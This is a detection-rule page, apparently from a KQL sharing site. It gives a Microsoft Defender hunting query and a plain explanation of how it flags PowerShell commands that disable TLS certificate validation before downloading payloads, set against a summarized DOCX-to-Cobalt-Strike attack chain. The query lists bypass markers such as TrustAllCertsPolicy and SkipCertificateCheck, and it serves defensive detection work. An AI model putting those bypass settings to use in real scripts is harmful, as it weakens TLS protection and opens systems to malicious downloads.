KQL Search

Query Details

HomeAI ToolsDevice Query

Detect TLS Validation Bypass Via Power Shell

Query

**Detect TLS validation bypass via PowerShell**

PowerShell disabling TLS validation before downloading the payload, it’s a small step, but a very useful one from a detection point of view.
Just reading about a fake Boeing RFQ was enough to trigger a full attack chain — starting from a DOCX and moving through RTF, JavaScript, PowerShell and even a full Python runtime, ending with Cobalt Strike running in memory.
Nothing particularly new in terms of techniques, but the way everything is chained together makes it effective and easy to miss. It relies on tools and formats we see daily.
Being focus on catch the IoA Pattern, I created the KQL Detection below. 

```
DeviceProcessEvents 
| where Timestamp > ago(7d) 
| where FileName in~ ("powershell.exe","pwsh.exe") 
| where ProcessCommandLine has_any ("ServerCertificateValidationCallback","TrustAllCertsPolicy","SkipCertificateCheck","CertificatePolicy") 
| project Timestamp, DeviceName,DeviceId, AccountName, FileName, ProcessCommandLine , ReportId
```

Explanation

This KQL (Kusto Query Language) query is designed to detect suspicious activity related to the use of PowerShell to bypass TLS (Transport Layer Security) validation. Here's a simple breakdown of what the query does:

  1. Data Source: The query looks at DeviceProcessEvents, which contains information about processes running on devices.

  2. Time Frame: It filters events from the last 7 days (Timestamp > ago(7d)).

  3. Targeted Processes: It specifically focuses on processes where the file name is either powershell.exe or pwsh.exe, which are common executables for running PowerShell scripts.

  4. Suspicious Commands: The query searches for specific terms in the command line arguments of these processes that are indicative of TLS validation bypass techniques. These terms include:

    • ServerCertificateValidationCallback
    • TrustAllCertsPolicy
    • SkipCertificateCheck
    • CertificatePolicy

  5. Output: The query projects (selects) relevant information for further analysis, including:

    • Timestamp: When the event occurred.
    • DeviceName: The name of the device where the event was logged.
    • DeviceId: The unique identifier for the device.
    • AccountName: The user account under which the process was run.
    • FileName: The name of the executable file.
    • ProcessCommandLine: The full command line that was executed.
    • ReportId: An identifier for the report or event.

In summary, this query is designed to identify instances where PowerShell scripts are potentially disabling TLS certificate validation, which could be part of a larger attack chain involving malicious payloads. This is a common technique used by attackers to avoid security checks when downloading malicious content.

Details

Sergio Albea profile picture

Sergio Albea

Released: April 3, 2026

Tables

DeviceProcessEvents

Keywords

DeviceProcessEventsTimestampFileNameProcessCommandLineDeviceNameDeviceIdAccountNameReportId

Operators

DeviceProcessEvents|where>ago()in~has_anyproject

Actions